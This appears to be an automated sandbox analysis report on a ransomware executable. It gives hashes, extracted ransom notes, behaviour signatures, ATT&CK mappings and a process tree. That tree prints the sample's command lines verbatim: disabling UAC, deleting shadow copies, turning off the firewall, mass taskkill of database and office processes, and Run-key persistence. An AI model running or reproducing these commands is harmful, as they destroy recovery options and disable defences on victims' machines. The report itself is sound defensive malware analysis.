Analysis

  • max time kernel
    150s
  • max time network
    148s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    01-04-2021 09:52

General

  • Target

    rcru_64.exe

  • Size

    1.0MB

  • MD5

    0d5d7377432ee449f30626c2371a0080

  • SHA1

    56a1d1203d62c131b70837d75af79aa19a3b0487

  • SHA256

    94c8cf0e19aa11a48a57baf54cc3679dda1dac4ad59ece1bf86ef117a974ddf9

  • SHA512

    19980615dbcba8ca8151aa5b93bc614b79edd1d77abbe37293001ecf16991cc939afca1cf62cac90c05510174cb8b7521a3074fbc160b47fd53d374521e06f0a

Malware Config

Extracted

Path

\??\c:\Read_Me!_.txt

Ransom Note
Your Data Locked. To Get Decryption Instructions Email Us ,Don't Edit Files Or Folders ! ID : rfeHv0 Email Address :FilesRecoverEN@Gmail.com
Emails

FilesRecoverEN@Gmail.com

Extracted

Path

C:\Users\Admin\Desktop\ReadMe_Now!.hta

Ransom Note
All Your Files Have Been Encrypted ! All Your Files Encrypted Due To A Security Problem With Your PC. If You Need Your Files Please Send Us E-mail To Get Decryption Tools .The Only Way Of Recovering Files Is To Purchase For Decryption Tools ( Payment Must Be Made With Bitcoin ) . If You Do Not E-mail Us After 48 Hours Decryption Fee Will Double.Our E-mail Address : FilesRecoverEN@Gmail.comYour Personal ID : rfeHv0Sent E-mail Should Be Contains Your Personal ID.If Don't Get a Response Or Any Other Problem Write Us E-mail At : FilesRecoverEN@Protonmail.com Check Your Spam Folder Too. What Guarantee Do We Give You ? You Can Send Some Files For Decryption Test( Before Paying ). File Size Must Be Less Than 2MB And Files Should Not Contains Valuabe Data Like (Backups , Databases etc ... ) . Get Buy Bitcoin Instructions At LocalBitcoins : https://localbitcoins.com/guides/how-to-buy-bitcoins Buy Bitcoin Instructions At Coindesk And Other Websites By Searching At Google :http://www.coindesk.com/information/how-can-i-buy-bitcoins/ Attention !! Do Not Edit Or Rename Encrypted Files. Do Not Try To Decrypt Files By Third-Party Or Data Recovery Softwares It May Damage Files Forever. In Case Of Trying To Decrypt Files With Third-Party,Recovery Sofwares This May Make The Decryption Harder So Prices Will Be Rise.
Emails

FilesRecoverEN@Gmail.comYour

FilesRecoverEN@Protonmail.com

Signatures

  • UAC bypass 3 TTPs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies Windows Firewall 1 TTPs
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Drops startup file 4 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 19 IoCs
  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in Program Files directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 40 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
  • Modifies registry key 1 TTPs 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\rcru_64.exe
    "C:\Users\Admin\AppData\Local\Temp\rcru_64.exe"
    1⤵
    • Modifies extensions of user files
    • Drops startup file
    • Drops desktop.ini file(s)
    • Enumerates connected drives
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:1152
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\SysWOW64\reg.exe
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Modifies registry key
        PID:1976
      • C:\Windows\SysWOW64\vssadmin.exe
        vssadmin.exe Delete Shadows /All /Quiet
        3⤵
        • Interacts with shadow copies
        PID:1972
      • C:\Windows\SysWOW64\Wbem\WMIC.exe
        wmic shadowcopy delete
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1772
      • C:\Windows\SysWOW64\netsh.exe
        netsh advfirewall set currentprofile state off
        3⤵
          PID:1764
        • C:\Windows\SysWOW64\netsh.exe
          netsh firewall set opmode mode=disable
          3⤵
            PID:916
          • C:\Windows\SysWOW64\netsh.exe
            netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes
            3⤵
              PID:544
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c taskkill /im notepad.exe&taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1108
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im notepad.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1224
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im msftesql.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1984
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlagent.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1784
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlbrowser.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1584
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlservr.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqlwriter.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:976
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im oracle.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1764
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocssd.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1812
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im dbsnmp.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:304
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im synctime.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1624
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im agntsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:2008
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mydesktopqos.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1896
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im isqlplussvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1612
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im xfssvccon.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1456
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mydesktopservice.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1056
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocautoupds.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:284
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im agntsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im encsvc.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1188
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im firefoxconfig.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1996
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im tbirdconfig.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1776
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im ocomm.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:1716
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld.exe
              3⤵
              • Kills process with taskkill
              PID:1616
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld-nt.exe
              3⤵
              • Kills process with taskkill
              PID:664
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mysqld-opt.exe
              3⤵
              • Kills process with taskkill
              PID:804
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im dbeng50.exe
              3⤵
              • Kills process with taskkill
              PID:468
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im sqbcoreservice.exe
              3⤵
              • Kills process with taskkill
              PID:668
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im excel.exe
              3⤵
              • Kills process with taskkill
              PID:1196
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im infopath.exe
              3⤵
              • Kills process with taskkill
              PID:1224
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im msaccess.exe
              3⤵
              • Kills process with taskkill
              PID:1984
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im mspub.exe
              3⤵
              • Kills process with taskkill
              PID:1784
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im onenote.exe
              3⤵
              • Kills process with taskkill
              PID:1692
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im outlook.exe
              3⤵
              • Kills process with taskkill
              PID:1772
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im powerpnt.exe
              3⤵
              • Kills process with taskkill
              PID:1380
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im steam.exe
              3⤵
              • Kills process with taskkill
              PID:284
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thebat.exe
              3⤵
              • Kills process with taskkill
              PID:916
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thebat64.exe
              3⤵
              • Kills process with taskkill
              PID:556
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im thunderbird.exe
              3⤵
              • Kills process with taskkill
              PID:296
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im visio.exe
              3⤵
              • Kills process with taskkill
              PID:1304
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im winword.exe
              3⤵
              • Kills process with taskkill
              PID:1584
            • C:\Windows\SysWOW64\taskkill.exe
              taskkill /im wordpad.exe
              3⤵
              • Kills process with taskkill
              PID:1456
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c echo %date%-%time%
            2⤵
              PID:1056
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ver
              2⤵
                PID:1352
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com
                2⤵
                  PID:612
                  • C:\Windows\SysWOW64\nslookup.exe
                    nslookup myip.opendns.com. resolver1.opendns.com
                    3⤵
                      PID:324
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f&reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                    2⤵
                      PID:1460
                      • C:\Windows\SysWOW64\reg.exe
                        reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                        3⤵
                          PID:1060
                        • C:\Windows\SysWOW64\reg.exe
                          reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /f
                          3⤵
                          • Modifies registry key
                          PID:1188
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f&reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                        2⤵
                          PID:1968
                          • C:\Windows\SysWOW64\reg.exe
                            reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Updaters /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                            3⤵
                            • Adds Run key to start application
                            • Modifies registry key
                            PID:896
                          • C:\Windows\SysWOW64\reg.exe
                            reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v Machin_Update /t REG_SZ /d c:\$Recycle.Bin\RCRU_64.exe /f
                            3⤵
                            • Adds Run key to start application
                            PID:1104
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\ReadMe_Now!.hta"
                          2⤵
                          • Modifies Internet Explorer settings
                          PID:1204
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Documents and Settings\Admin\Desktop\ReadMe_Now!.hta"
                          2⤵
                          • Modifies Internet Explorer settings
                          PID:1724
                      • C:\Windows\system32\vssvc.exe
                        C:\Windows\system32\vssvc.exe
                        1⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1316
                      • C:\Windows\explorer.exe
                        "C:\Windows\explorer.exe"
                        1⤵
                          PID:960
                        • C:\Windows\system32\AUDIODG.EXE
                          C:\Windows\system32\AUDIODG.EXE 0x1c0
                          1⤵
                            PID:1692
                          • C:\Windows\system32\NOTEPAD.EXE
                            "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\Read_Me!_.txt
                            1⤵
                              PID:860

                            Network

                            MITRE ATT&CK Matrix ATT&CK v6

                            Persistence

                            Modify Existing Service

                            1
                            T1031

                            Registry Run Keys / Startup Folder

                            1
                            T1060

                            Privilege Escalation

                            Bypass User Account Control

                            1
                            T1088

                            Defense Evasion

                            Bypass User Account Control

                            1
                            T1088

                            Disabling Security Tools

                            1
                            T1089

                            Modify Registry

                            4
                            T1112

                            File Deletion

                            2
                            T1107

                            Credential Access

                            Credentials in Files

                            1
                            T1081

                            Discovery

                            Query Registry

                            1
                            T1012

                            Peripheral Device Discovery

                            1
                            T1120

                            System Information Discovery

                            2
                            T1082

                            Collection

                            Data from Local System

                            1
                            T1005

                            Impact

                            Inhibit System Recovery

                            2
                            T1490

                            Replay Monitor

                            Loading Replay Monitor...

                            Downloads

                            • C:\Users\Admin\Desktop\ReadMe_Now!.hta
                              MD5

                              0dc2284aa300da82f73edf834dfa17fc

                              SHA1

                              36b14457648c4c97f000e818923559498928d902

                              SHA256

                              ab7fc0f5cba98f39241b4d3bca54589e00bfb7ce0babe487cdb425c026fc858d

                              SHA512

                              543041a7f19cd1fc599029a391b69b783e3f7a1e7ef9b8dbbfa00dbdf16cbae5abafd2d2a3de8a54a5bba20cb827a7ef8d611d39c5a8125e4ce758951572ff97

                            • C:\Users\Admin\Desktop\Read_Me!_.txt
                              MD5

                              a31ed461bf648a1f44b8419efbfce439

                              SHA1

                              fde48ca8312505b27492c0f7628acd9e9155deae

                              SHA256

                              2ea814273b2d74bc4aabf8aa0b975b3c92177e7ea417f7a62e18dc41b969cc95

                              SHA512

                              fb8e4f57f9823daa52b1abceda86f59fb66ecdf808420a3416f8e8c6a7f98ef27036bc01b9a73725dc17cbc24513a32f215512df372a1e513077e23b827daec6

                            • memory/284-29-0x0000000000000000-mapping.dmp
                            • memory/284-47-0x0000000000000000-mapping.dmp
                            • memory/296-50-0x0000000000000000-mapping.dmp
                            • memory/304-22-0x0000000000000000-mapping.dmp
                            • memory/324-57-0x0000000000000000-mapping.dmp
                            • memory/468-38-0x0000000000000000-mapping.dmp
                            • memory/544-11-0x0000000000000000-mapping.dmp
                            • memory/556-49-0x0000000000000000-mapping.dmp
                            • memory/612-56-0x0000000000000000-mapping.dmp
                            • memory/664-36-0x0000000000000000-mapping.dmp
                            • memory/668-39-0x0000000000000000-mapping.dmp
                            • memory/804-37-0x0000000000000000-mapping.dmp
                            • memory/896-62-0x0000000000000000-mapping.dmp
                            • memory/916-48-0x0000000000000000-mapping.dmp
                            • memory/916-9-0x0000000000000000-mapping.dmp
                            • memory/916-30-0x0000000000000000-mapping.dmp
                            • memory/960-64-0x000007FEFB991000-0x000007FEFB993000-memory.dmp
                              Filesize

                              8KB

                            • memory/976-19-0x0000000000000000-mapping.dmp
                            • memory/1056-54-0x0000000000000000-mapping.dmp
                            • memory/1056-28-0x0000000000000000-mapping.dmp
                            • memory/1060-59-0x0000000000000000-mapping.dmp
                            • memory/1104-63-0x0000000000000000-mapping.dmp
                            • memory/1108-13-0x0000000000000000-mapping.dmp
                            • memory/1152-2-0x00000000760C1000-0x00000000760C3000-memory.dmp
                              Filesize

                              8KB

                            • memory/1188-31-0x0000000000000000-mapping.dmp
                            • memory/1188-60-0x0000000000000000-mapping.dmp
                            • memory/1196-40-0x0000000000000000-mapping.dmp
                            • memory/1204-68-0x0000000000000000-mapping.dmp
                            • memory/1224-14-0x0000000000000000-mapping.dmp
                            • memory/1224-41-0x0000000000000000-mapping.dmp
                            • memory/1304-51-0x0000000000000000-mapping.dmp
                            • memory/1352-55-0x0000000000000000-mapping.dmp
                            • memory/1352-18-0x0000000000000000-mapping.dmp
                            • memory/1380-46-0x0000000000000000-mapping.dmp
                            • memory/1456-53-0x0000000000000000-mapping.dmp
                            • memory/1456-27-0x0000000000000000-mapping.dmp
                            • memory/1460-58-0x0000000000000000-mapping.dmp
                            • memory/1584-52-0x0000000000000000-mapping.dmp
                            • memory/1584-17-0x0000000000000000-mapping.dmp
                            • memory/1612-26-0x0000000000000000-mapping.dmp
                            • memory/1616-35-0x0000000000000000-mapping.dmp
                            • memory/1624-23-0x0000000000000000-mapping.dmp
                            • memory/1692-44-0x0000000000000000-mapping.dmp
                            • memory/1716-34-0x0000000000000000-mapping.dmp
                            • memory/1724-69-0x0000000000000000-mapping.dmp
                            • memory/1764-7-0x0000000000000000-mapping.dmp
                            • memory/1764-20-0x0000000000000000-mapping.dmp
                            • memory/1772-45-0x0000000000000000-mapping.dmp
                            • memory/1772-6-0x0000000000000000-mapping.dmp
                            • memory/1776-33-0x0000000000000000-mapping.dmp
                            • memory/1784-16-0x0000000000000000-mapping.dmp
                            • memory/1784-43-0x0000000000000000-mapping.dmp
                            • memory/1812-21-0x0000000000000000-mapping.dmp
                            • memory/1896-25-0x0000000000000000-mapping.dmp
                            • memory/1968-61-0x0000000000000000-mapping.dmp
                            • memory/1972-5-0x0000000000000000-mapping.dmp
                            • memory/1976-4-0x0000000000000000-mapping.dmp
                            • memory/1984-42-0x0000000000000000-mapping.dmp
                            • memory/1984-15-0x0000000000000000-mapping.dmp
                            • memory/1996-32-0x0000000000000000-mapping.dmp
                            • memory/2008-24-0x0000000000000000-mapping.dmp
                            • memory/2032-67-0x000007FEF6010000-0x000007FEF628A000-memory.dmp
                              Filesize

                              2.5MB

                            • memory/2032-3-0x0000000000000000-mapping.dmp